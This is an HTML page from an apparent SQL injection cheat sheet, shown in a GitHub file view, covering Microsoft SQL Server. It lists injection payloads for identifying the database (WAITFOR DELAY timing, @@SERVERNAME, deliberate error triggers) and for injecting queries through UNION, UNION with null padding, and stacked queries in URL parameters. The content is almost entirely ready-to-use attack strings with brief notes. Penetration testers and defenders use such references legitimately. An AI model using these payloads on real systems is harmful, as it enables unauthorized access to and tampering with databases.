-
Notifications
You must be signed in to change notification settings - Fork 147
Expand file tree
/
Copy pathsqlserver.html
More file actions
78 lines (73 loc) · 2.75 KB
/
Copy pathsqlserver.html
File metadata and controls
78 lines (73 loc) · 2.75 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
<h3 id="sql-injection-detection">DBMS Identification</h3>
<p class="pageDescription">{{site.data.injectionDescriptions.dbmsIdentification}}</p>
<p><i>Note: The comment characters <code> -- </code> are placed after the query to remove any commmands following our query, helping to prevent errors.</i></p>
<table class="table table-striped table-hover">
<thead>
<tr>
<th>Description</th>
<th>Query</th>
</tr>
</thead>
<tbody>
<tr>
<td>WAITFOR Function</td>
<td>page.asp?id=';WAITFOR DELAY '00:00:10'; -- </td>
</tr>
<tr>
<td>Default variable</td>
<td>page.asp?id=sql'; SELECT @@SERVERNAME -- </td>
</tr>
<tr>
<td>String concatenation</td>
<td>page.php?id='mssql'+'mssql' -- </td>
</tr>
<tr>
<td>Functions</td>
<td>@@rowcount -- <br>
SQUARE(1) -- <br>
@@pack_received -- </td>
</tr>
<tr>
<td>Error messages<br/><i>Note: Triggering DB errors through invalid syntax will sometimes return verbose error messages that include the DBMS name.</i></td>
<td>page.asp?id='</td>
</tr>
<tr>
<td>Error messages<br/><i>Note: If the id parameter is an integer, the string value of the @@SERVERNAME variable can cause a conversion error.</i></td>
<td>page.asp?id=@@SERVERNAME</td>
</tr>
<tr>
<td>Error messages<br/><i>Note: If the id parameter is an integer, the string value of the @@SERVERNAME variable can cause a conversion error.</i></td>
<td>page.asp?id=0/@@SERVERNAME</td>
</tr>
</tbody>
</table>
<h3 id="general-tips">General Tips</h3>
<p>ASP/ASPX based applications are generally MSSQL.</p>
<h3 id="sql-injection-types">Converting queries to injections</h3>
<p>Now that the injection has been identified, the rest of this guide will contain full queries. Use the methods below to insert those queries into your injection points. <code>SELECT @@version</code> will be the example query.</p>
<table class="table table-striped table-hover">
<thead>
<tr>
<th>Description</th>
<th align="left">Query</th>
</tr>
</thead>
<tbody>
<tr>
<td>Union</td>
<td>product.asp?id=' UNION SELECT @@version -- </td>
</tr>
<tr>
<td>Union subquery</td>
<td>product.asp?id=' UNION (SELECT @@version) -- </td>
</tr>
<tr>
<td>Union null<br/><i>Note: If original query returns more than one column, add null to equal the number of columns</i></td>
<td>product.asp?id=' UNION (SELECT @@version,null) -- <br></td>
</tr>
<tr>
<td>Stacked query<br/><i>Note: Stacked queries do not always return results, so they are best used for injections that update/modify data.</i></td>
<td>product.asp?id='; SELECT @@version --<br></td>
</tr>
</tbody>
</table>